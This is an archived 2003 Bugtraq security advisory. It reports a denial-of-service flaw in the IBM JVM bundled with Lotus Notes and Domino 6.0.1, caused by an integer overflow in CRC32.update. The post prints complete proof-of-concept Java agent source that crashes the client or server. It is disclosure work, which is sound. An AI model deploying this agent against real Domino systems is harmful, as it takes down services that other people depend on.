Java Agent freezes Lotus Notes and Domino 6.0.1

• Previous message: @stake Advisories: "Vignette Story Server sensitive information disclosure (a040703-1)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Sat, 5 Apr 2003 23:48:50 +0200 (MES)
From: Marc Schoenefeld <schonef@uni-muenster.de>
To: bugtraq@securityfocus.com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi,

the following agent causes the IBM JVM 1.3.1 shipped with Lotus Domino 6.0.1
and Lotus Notes 6.0.1 to crash. After calling the agent a huge amount of memory
is not freed and causes the server machine (observed on MS XP) to
deny further service.

IMPLICATIONS
- - If the agent is run on the client, Lotus Notes 6.0.1 is vulnerable,
- - if the agent is run on the server, Lotus Domino 6.0.1 is vulnerable.

ANALYSIS:
The call to the "update" method of the CRC32 raises an integer overflow
in the java java.util.zip.* core libraries which triggers a jni routine
that cannot handle the extreme high input value.

HISTORY:
This vulnerability has already been detected in the Sun JDK
(http://developer.java.sun.com/developer/bugParade/bugs/4811913.html),
and was disclosed at Blackhat Windows 2003.
The background of this bugs is described at www.illegalaccess.org

Sincerely
Marc Schoenefeld

=========================Agent Source Code===========================
import lotus.domino.*;
import java.util.zip.*;

public class JavaAgent extends AgentBase {

        public void NotesMain() {

                try {
                        Session session = getSession();
                        AgentContext agentContext =
session.getAgentContext();
                         CRC32 crc32 = new CRC32();
        crc32.update(new byte[0], 4, 0x7ffffffc);

                        // (Your code goes here)

                } catch(Exception e) {
                        e.printStackTrace();
                }
        }
}
=========================Agent Source Code===========================

- --

Never be afraid to try something new. Remember, amateurs built the
ark; professionals built the Titanic. -- Anonymous

Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (AIX)
Comment: For info see http://www.gnupg.org

iD8DBQE+j09FqCaQvrKNUNQRAs9uAJ4unAFEKqqRuk4gBlkNSKQ5rTMa0wCfVzC+
iJHcqblX8QE7UaPofUrKU3Y=
=l93r
-----END PGP SIGNATURE-----

• Previous message: @stake Advisories: "Vignette Story Server sensitive information disclosure (a040703-1)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages [NEWS] Java Agent Freezes Lotus Notes and Domino ... A vulnerability caused by a specially crafted "agent" causes the IBM JVM ... shipped with Lotus Domino 6.0.1 and Lotus Notes 6.0.1 to crash. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ... (Securiteam) [VulnWatch] Java Agent freezes Lotus Notes and Domino 6.0.1 (fwd) ... After calling the agent a huge amount of memory ... If the agent is run on the client, Lotus Notes 6.0.1 is vulnerable, ... if the agent is run on the server, Lotus Domino 6.0.1 is vulnerable. ... This vulnerability has already been detected in the Sun JDK ... (VulnWatch) Running URL using VBA - but not displaying IE window ... I need to run a URL usnig VBA (this in turn runs a Lotus Notes Agent). ... matpj's Profile: http://www.excelforum.com/member.php?action=getinfo&userid=21076 ... (microsoft.public.excel.programming) Re: calling Lotus Notes Agent from .NET ... you should be able to trigger an agent calling a URL (?OpenAgent ... agent using Lotus Script. ... using the Domino object model or the Lotus Notes COM ... (microsoft.public.dotnet.languages.csharp)